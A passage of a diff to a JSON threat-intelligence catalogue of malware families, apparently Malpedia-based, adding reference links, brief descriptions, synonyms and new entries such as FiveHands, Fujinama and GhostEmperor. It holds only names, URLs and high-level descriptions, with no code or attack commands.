"https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis" + ], + "synonyms": [], + "type": [] + }, + "uuid": "28697d08-27c0-47a9-bfd6-654cac4d55cc", + "value": "FatalRat" + }, { "description": "According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.", "meta": { @@ -15308,7 +17586,7 @@ "value": "FatDuke" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct", @@ -15318,7 +17596,7 @@ "type": [] }, "uuid": "a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd", - "value": "FCT Ransomware" + "value": "FCT" }, { "description": "", @@ -15373,8 +17651,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://twitter.com/3xp0rtblog/status/1321209656774135810" + "https://twitter.com/3xp0rtblog/status/1321209656774135810", + "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/" ], "synonyms": [], "type": [] @@ -15427,6 +17711,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], @@ -15444,10 +17729,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", + "https://securelist.com/finspy-unseen-findings/104322/", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", @@ -15529,6 +17816,24 @@ "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands", + "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d0dc7a3-07bf-4cb9-ba86-c7f154c6b678", + "value": "FiveHands" + }, { "description": "", "meta": { @@ -15585,6 +17890,7 @@ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], @@ -15658,6 +17964,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html" ], @@ -15755,7 +18062,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", - "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/", + "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/" ], "synonyms": [], "type": [] @@ -15770,9 +18078,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", + "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://link.medium.com/uaBiIXgUU8", "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", @@ -15780,23 +18090,34 @@ "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", "https://isc.sans.edu/diary/26806", "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", + "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", + "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii", "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://youtu.be/aQwnHIlGSBM", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" + "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html" + ], + "synonyms": [ + "win.xloader" ], - "synonyms": [], "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", @@ -15866,23 +18187,29 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", - "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "http://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ @@ -15895,6 +18222,19 @@ "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, + { + "description": "Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fujinama", + "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa" + ], + "synonyms": [], + "type": [] + }, + "uuid": "efd4ec64-ad22-424b-9b7a-d9060cc29d3b", + "value": "win.fujinama" + }, { "description": "", "meta": { @@ -16009,8 +18349,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf", + "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", @@ -16048,6 +18392,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", @@ -16055,23 +18401,27 @@ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "http://www.secureworks.com/research/threat-profiles/gold-garden", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", "https://www.secureworks.com/research/threat-profiles/gold-garden", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", @@ -16083,8 +18433,10 @@ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", "https://vimeo.com/449849549", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", @@ -16098,6 +18450,19 @@ "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, + { + "description": "A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gasket", + "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ed854ba-c280-4d5b-9b84-c61dddd43f66", + "value": "Gasket" + }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { @@ -16145,6 +18510,19 @@ "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner", + "https://bazaar.abuse.ch/browse/signature/GCleaner/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "874d6868-08fd-4b66-877d-fd2174f0d275", + "value": "GCleaner" + }, { "description": "", "meta": { @@ -16277,6 +18655,19 @@ "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", "value": "get_pwd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9c89baf1-9639-4990-b218-14680170944f", + "value": "Gh0stTimes" + }, { "description": "", "meta": { @@ -16294,6 +18685,20 @@ "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor", + "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit", + "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "968e52d1-e1d1-499a-acdc-b21522646e28", + "value": "GhostEmperor" + }, { "description": "", "meta": { @@ -16332,6 +18737,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", @@ -16344,12 +18750,13 @@ "http://www.nartv.org/mirror/ghostnet.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://blog.cylance.com/the-ghost-dragon", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", "https://s.tencent.com/research/report/836.html", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", "https://blog.talosintelligence.com/2019/09/panda-evolution.html", "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.datanet.co.kr/news/articleView.html?idxno=133346", @@ -16357,17 +18764,21 @@ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://risky.biz/whatiswinnti/", "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", - "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/" + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Farfli", @@ -16380,7 +18791,7 @@ "value": "Ghost RAT" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish", @@ -16390,7 +18801,7 @@ "type": [] }, "uuid": "f561656c-19d1-4b07-a193-3293d053e774", - "value": "Gibberish Ransomware" + "value": "Gibberish" }, { "description": "", @@ -16469,10 +18880,12 @@ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://isc.sans.edu/diary/23417", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" @@ -16513,14 +18926,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://resources.infosecinstitute.com/tdss4-part-1/", "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://habr.com/ru/company/solarsecurity/blog/578900/", "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", + "https://labs.k7computing.com/?p=22319", "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", + "https://community.riskiq.com/article/2a36a7d2/description", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" @@ -16682,11 +19099,13 @@ "value": "GoldenSpy" }, { - "description": "", + "description": "Gold Max is a Golang written command and control backdoor used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" ], "synonyms": [ @@ -16702,9 +19121,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + ], + "synonyms": [ + "Lovexxx" ], - "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", @@ -16794,6 +19217,7 @@ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://securelist.com/gootkit-the-cautious-trojan/102731/", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", @@ -16804,6 +19228,7 @@ "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", 